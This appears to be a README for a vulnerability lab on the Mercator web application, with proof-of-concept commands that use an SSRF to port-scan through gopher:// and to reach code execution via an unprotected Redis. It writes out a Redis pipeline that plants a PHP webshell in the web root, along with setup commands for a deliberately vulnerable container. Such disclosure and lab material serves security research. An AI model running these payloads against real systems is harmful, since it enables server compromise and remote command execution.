Two PoCs and a reset script are available:
- ssrf2scan.py : Perform a TCP port scan through the SSRF using the gopher:// scheme (telnet-style connection probing).
- ssrf2rce.py : Achieve RCE via a webshell by exploiting a vulnerable Redis service on the same network as Mercator.
- reset-lab.sh : Delete the webshell written by the ssrf2rce.py PoC.
To start the lab, use these commands.

Run the port-scan PoC against the Mercator instance:

```sh
python3 ssrf2scan.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --target 127.0.0.1 --ports 3306
```

After starting the Mercator Docker container, you need to add a second container for the vulnerable Redis instance (protected mode is disabled and the Mercator web root is mounted into the container, which is what makes this lab instance exploitable):

```sh
docker run -d --name redis-poc --user 501:501 -p 127.0.0.1:6379:6379 -v /var/www/mercator:/var/www/mercator redis:latest redis-server --protected-mode no --save "" --appendonly no --enable-protected-configs yes
```

Then run the RCE PoC, passing the Redis commands to execute as a `';'`-separated pipeline:

```sh
python3 ssrf2rce.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --redis 127.0.0.1:6379 --pipeline CONFIG SET dir /var/www/mercator/public ';' CONFIG SET dbfilename poc.php ';' SET poc $'\n\n<?php system($_GET["c"]); ?>\n\n' ';' SAVE
```